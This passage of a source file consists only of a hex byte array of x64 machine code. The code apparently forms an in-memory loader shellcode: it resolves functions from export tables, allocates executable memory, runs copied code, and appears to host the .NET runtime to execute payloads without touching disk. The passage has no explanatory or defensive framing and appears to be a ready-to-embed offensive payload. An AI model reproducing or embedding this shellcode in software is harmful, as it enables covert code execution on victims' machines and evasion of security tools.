616 | 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
617 | 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
618 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00, | |
619 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20, | |
620 | 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
621 | 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, | |
622 | 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, | |
623 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, | |
624 | 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, | |
625 | 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, | |
626 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
627 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, | |
628 | 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00, | |
629 | 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff, | |
630 | 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, | |
631 | 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80, | |
632 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, | |
633 | 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, | |
634 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, | |
635 | 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, | |
636 | 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01, | |
637 | 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, | |
638 | 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07, | |
639 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
640 | 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, | |
641 | 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, | |
642 | 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f, | |
643 | 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45, | |
644 | 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1, | |
645 | 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, | |
646 | 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, | |
647 | 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d, | |
648 | 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44, | |
649 | 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00, | |
650 | 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11, | |
651 | 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
652 | 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, | |
653 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85, | |
654 | 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
655 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48, | |
656 | 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8, | |
657 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, | |
658 | 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, | |
659 | 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, | |
660 | 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90, | |
661 | 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, | |
662 | 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, | |
663 | 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, | |
664 | 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb, | |
665 | 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, | |
666 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
667 | 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
668 | 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, | |
669 | 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
670 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, | |
671 | 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92, | |
672 | 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41, | |
673 | 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, | |
674 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, | |
675 | 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
676 | 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92, | |
677 | 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55, | |
678 | 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, | |
679 | 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, | |
680 | 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, | |
681 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
682 | 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, | |
683 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, | |
684 | 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
685 | 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, | |
686 | 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a, | |
687 | 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, | |
688 | 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
689 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, | |
690 | 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, | |
691 | 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, | |
692 | 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45, | |
693 | 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66, | |
694 | 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, | |
695 | 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00, | |
696 | 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89, | |
697 | 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0, | |
698 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
699 | 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0, | |
700 | 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
701 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
702 | 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, | |
703 | 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
704 | 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, | |
705 | 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, | |
706 | 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00, | |
707 | 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48, | |
708 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41, | |
709 | 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
710 | 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, | |
711 | 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, | |
712 | 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, | |
713 | 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16, | |
714 | 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00, | |
715 | 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b, | |
716 | 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, | |
717 | 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
718 | 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, | |
719 | 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, | |
720 | 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, | |
721 | 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
722 | 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00, | |
723 | 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
724 | 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, | |
725 | 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, | |
726 | 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18, | |
727 | 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0, | |
728 | 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, | |
729 | 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, | |
730 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00, | |
731 | 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, | |
732 | 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, | |
733 | 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, | |
734 | 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, | |
735 | 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, | |
736 | 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00, | |
737 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, | |
738 | 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, | |
739 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, | |
740 | 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02, | |
741 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
742 | 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c, | |
743 | 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, | |
744 | 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80, | |
745 | 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, | |
746 | 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
747 | 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, | |
748 | 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, | |
749 | 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0, | |
750 | 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b, | |
751 | 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00, | |
752 | 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, | |
753 | 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
754 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, | |
755 | 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, | |
756 | 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, | |
757 | 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, | |
758 | 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, | |
759 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, | |
760 | 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00, | |
761 | 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, | |
762 | 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
763 | 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, | |
764 | 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00, | |
765 | 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00, | |
766 | 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, | |
767 | 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
768 | 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff, | |
769 | 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
770 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
771 | 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c, | |
772 | 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
773 | 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28, | |
774 | 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, | |
775 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, | |
776 | 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, | |
777 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, | |
778 | 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, | |
779 | 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, | |
780 | 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, | |
781 | 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48, | |
782 | 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, | |
783 | 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, | |
784 | 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
785 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
786 | 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
787 | 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, | |
788 | 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, | |
789 | 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, | |
790 | 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, | |
791 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
792 | 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14, | |
793 | 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, | |
794 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00, | |
795 | 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, | |
796 | 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, | |
797 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30, | |
798 | 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, | |
799 | 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, | |
800 | 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, | |
801 | 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, | |
802 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00, | |
803 | 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
804 | 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, | |
805 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00, | |
806 | 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
807 | 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, | |
808 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00, | |
809 | 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
810 | 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, | |
811 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00, | |
812 | 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
813 | 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, | |
814 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00, | |
815 | 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
816 | 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, | |
817 | 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
818 | 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83, | |
819 | 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
820 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, | |
821 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, | |
822 | 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b, | |
823 | 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00, | |
824 | 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, | |
825 | 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, | |
826 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04, | |
827 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, | |
828 | 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b, | |
829 | 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48, | |
830 | 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, | |
831 | 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, | |
832 | 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d, | |
